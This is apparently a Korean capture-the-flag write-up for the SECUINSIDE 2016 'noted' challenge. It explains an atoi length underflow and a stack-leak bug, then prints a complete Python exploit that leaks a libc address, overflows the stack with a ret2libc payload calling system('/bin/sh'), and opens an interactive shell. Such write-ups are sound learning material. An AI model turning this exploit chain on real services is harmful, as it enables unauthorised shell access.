SECUINSIDE 2016 noted (CTF) — 2016. 7. 11. 23:46
noted는 대회 때 언더플로우 벡터는 잡았지만 릭 벡터를 찾지 못해 아쉽게 풀지 못했다.
풀이를 보고 나서 풀게 되었는데, 정말 너무나도 간단해서 좀 아쉬웠다.
buf[read(0, buf, 0x10u) - 1] = 0; v5 = atoi(buf); // underflow
여기서 길이를 `atoi`로 받기 때문에 음수도 검사 없이 그대로 저장된다. -1을 넣어주면 이 값이 아래 `read(fd, v13, v2 - 16)`의 크기 계산에 쓰일 때 size_t로 감싸져(unsigned wrap) 사실상 무제한 크기가 되고, "new file can't exceed original size" 검사도 통과하므로 v13을 넘어서는 쓰기가 가능해진다.
그럼.. 내가 못찾았던 릭 벡터를 찾아보자
n = read(fd, v13, v2 - 16) - 1; v13[n] = 0; close(fd); printf("original data : "); write(1, v13, n);
Edit Note 메뉴에 들어가면 저장된 파일을 `read(fd, v13, v2 - 16)`으로 읽고, 그 결과에서 뽑은 n만큼 `write(1, v13, n)`으로 그대로 출력한다. 저장된 길이가 -1이면 이 크기 계산에 상한이 없으므로 출력이 v13을 넘어 스택 내용까지 그대로 나온다 (위 조각만으로 n이 정확히 어느 경로로 커지는지는 확정할 수 없다). 아래 익스플로잇은 이 출력에서 0x4cc바이트를 건너뛴 뒤 4바이트를 `__libc_start_main`으로 돌아가는 리턴 주소로 읽어 libc 베이스를 계산한다.
d?????n??q??q??n??n?
%??? ?q??p?pgp?r? ?q?Q?q???q?d???q???q?pgp?\??q?ag ?q?!?q?dnew file data (new file can't exceed original size) :
막 이리저리 나오게된다. 그럼 페이로드를 보자
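#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""Exploit for SECUINSIDE 2016 "noted" (chal.cykor.kr:20003).

Two bugs in the note service are chained:

1. Length underflow when writing a note: the length is parsed with ``atoi()``
   and stored unchecked, so sending ``-1`` makes the later
   ``read(fd, v13, v2 - 16)`` size wrap to a huge ``size_t`` (per the
   decompiled snippet in the writeup).  The "new file can't exceed original
   size" check is evidently satisfied as well, so an arbitrarily long edit
   overflows the stack buffer ``v13``.
2. Stack leak in "Edit Note": the service echoes the note with
   ``write(1, v13, n)`` and ``n`` is derived from that unbounded read, so the
   echo runs past ``v13`` into the stack.  Skipping ``LEAK_PREFIX_LEN`` bytes
   of that dump yields a saved return address into ``__libc_start_main``,
   from which the libc base is derived.

Then the note is overwritten with ``pad | system | fake-ret | "/bin/sh"`` and
the session is handed to an interactive shell.

Written for Python 2 (the original target); bytes literals and
``print_function`` keep it runnable under Python 3 as well.  Only ``main()``
touches the network, so the pure helpers can be imported and unit-tested.
"""
from __future__ import print_function

import socket
import struct

HOST = "chal.cykor.kr"
PORT = 20003

# Throwaway account for the session; anything works, it only has to be
# consistent between register() and login().
USER_ID = b"s0ngsari"
USER_PW = b"s0ngsari"
NOTE_TITLE = b"leavecat123"

# Bytes of stack dumped by the leak before the saved return address.
LEAK_PREFIX_LEN = 0x4cc
# Padding from v13 to the saved return address on the overflow path.
# NOTE(review): differs from LEAK_PREFIX_LEN by 0x40; both offsets are
# empirical for this binary and are not derived here -- re-verify them if
# the target build changes.
OVERFLOW_PAD_LEN = 0x48c

# Offsets inside the remote libc (specific to the challenge's libc build).
LIBC_START_MAIN_RET_OFF = 0x18637   # leaked return address -> libc base
LIBC_BINSH_OFF = 0x15909f           # "/bin/sh"
LIBC_SYSTEM_OFF = 0x3a920           # system()

# A first-stage write@plt leak chain (write_plt/write_got/pppr) that was
# built but never sent has been dropped: the stack dump in edit_note() already
# leaks libc directly.


def p32(value):
    """Pack *value* as a little-endian unsigned 32-bit integer."""
    return struct.pack("<L", value)


def u32(data):
    """Unpack exactly four bytes of *data* as a little-endian uint32.

    Raises ``struct.error`` if *data* is not exactly four bytes -- a short
    leak must not be silently misinterpreted as an address.
    """
    return struct.unpack("<L", data)[0]


def libc_addresses(leaked_ret):
    """Return ``(libc_base, binsh, system)`` for a leaked return address.

    *leaked_ret* is the saved return address into ``__libc_start_main`` read
    off the stack by :func:`edit_note`.
    """
    libc_base = leaked_ret - LIBC_START_MAIN_RET_OFF
    return libc_base, libc_base + LIBC_BINSH_OFF, libc_base + LIBC_SYSTEM_OFF


def build_overflow_payload(system, binsh):
    """Return the note body that smashes the stack on the next return.

    Layout: ``OVERFLOW_PAD_LEN`` filler bytes up to the saved return address,
    then ``system`` as the new return address, four bytes of fake return
    address for system(), and ``binsh`` as its first argument.
    """
    return b"A" * OVERFLOW_PAD_LEN + p32(system) + b"AAAA" + p32(binsh)


def recvuntil(sock, marker):
    """Read *sock* one byte at a time until the data ends with *marker*.

    Raises ``EOFError`` if the peer closes first: carrying on against a dead
    connection would only fail confusingly further down the dialogue, so fail
    loudly at the point where the protocol desynchronised.
    """
    data = b""
    while not data.endswith(marker):
        chunk = sock.recv(1)
        if not chunk:
            raise EOFError("connection closed while waiting for %r (got %r)"
                           % (marker, data))
        data += chunk
    return data


def recvn(sock, count):
    """Read exactly *count* bytes from *sock*.

    A single ``recv(count)`` may legitimately return fewer bytes on a TCP
    stream; for the leak that would shift the 4-byte return address and give
    a garbage libc base, so loop until the full amount has arrived.
    """
    chunks = []
    remaining = count
    while remaining:
        chunk = sock.recv(remaining)
        if not chunk:
            raise EOFError("connection closed after %d of %d bytes"
                           % (count - remaining, count))
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


def recv_main_menu(sock):
    """Consume (and echo) the top-level menu up to its last entry."""
    print(recvuntil(sock, b"3) Exit"))


def recv_note_menu(sock):
    """Consume (and echo) the per-user note menu up to its last entry."""
    print(recvuntil(sock, b"8) Logout"))


def register(sock):
    """Create the USER_ID account (main menu option 2)."""
    sock.sendall(b"2\n")
    print(recvuntil(sock, b"userid : "))
    sock.sendall(USER_ID + b"\n")
    print(recvuntil(sock, b"userpw : "))
    sock.sendall(USER_PW + b"\n")
    recv_main_menu(sock)


def login(sock):
    """Log in as USER_ID (main menu option 1); lands in the note menu."""
    sock.sendall(b"1\n")
    print(recvuntil(sock, b"userid : "))
    sock.sendall(USER_ID + b"\n")
    print(recvuntil(sock, b"userpw : "))
    sock.sendall(USER_PW + b"\n")
    recv_note_menu(sock)


def write_note(sock):
    """Create NOTE_TITLE with the poisoned length (note menu option 2)."""
    sock.sendall(b"2\n")
    print(recvuntil(sock, b"title : "))
    sock.sendall(NOTE_TITLE + b"\n")
    print(recvuntil(sock, b"filedata length : "))
    # The length goes through atoi() unchecked; -1 makes the service's later
    # size computation wrap, which is what both the leak and the overflow
    # in edit_note() rely on.
    sock.sendall(b"-1\n")
    print(recvuntil(sock, b"password : "))
    sock.sendall(b"\n")
    recv_note_menu(sock)


def edit_note(sock):
    """Leak libc from the note echo, then overwrite the note to pop a shell.

    Note menu option 4 prints "original data : " followed by the stack dump;
    the overflow payload is then sent as the new note data.
    """
    sock.sendall(b"4\n")
    print(recvuntil(sock, b"title : "))
    sock.sendall(NOTE_TITLE + b"\n")
    print(recvuntil(sock, b"password : "))
    sock.sendall(b"\n")
    print(recvuntil(sock, b"original data : "))

    # Stack contents before the saved return address are not needed, but
    # they must be read exactly so the address that follows is aligned.
    recvn(sock, LEAK_PREFIX_LEN)
    leaked_ret = u32(recvn(sock, 4))
    libc_base, binsh, system = libc_addresses(leaked_ret)
    # libc is mmap'ed, so its base is page-aligned; anything else means the
    # leak was misaligned or the libc offsets do not match this target.
    if libc_base & 0xfff:
        raise RuntimeError("implausible libc base %s from leaked %s"
                           % (hex(libc_base), hex(leaked_ret)))
    print("[*] LIBC base: " + hex(libc_base))
    print("[*] /bin/sh : " + hex(binsh))
    print("[*] system : " + hex(system))

    sock.sendall(build_overflow_payload(system, binsh) + b"\n")
    # Commands for the shell that system("/bin/sh") spawns on return.
    sock.sendall(b"cd /\n")
    sock.sendall(b"ls\n")


def main():
    """Run the full chain against HOST:PORT and drop into the shell."""
    # telnetlib is only needed for the interactive shell at the end and was
    # removed from the standard library in Python 3.13; importing it here
    # keeps the helpers above importable (and testable) without it.
    import telnetlib

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((HOST, PORT))
    try:
        register(sock)
        login(sock)
        write_note(sock)
        edit_note(sock)
        term = telnetlib.Telnet()
        term.sock = sock
        term.interact()
    finally:
        sock.close()


if __name__ == "__main__":
    main()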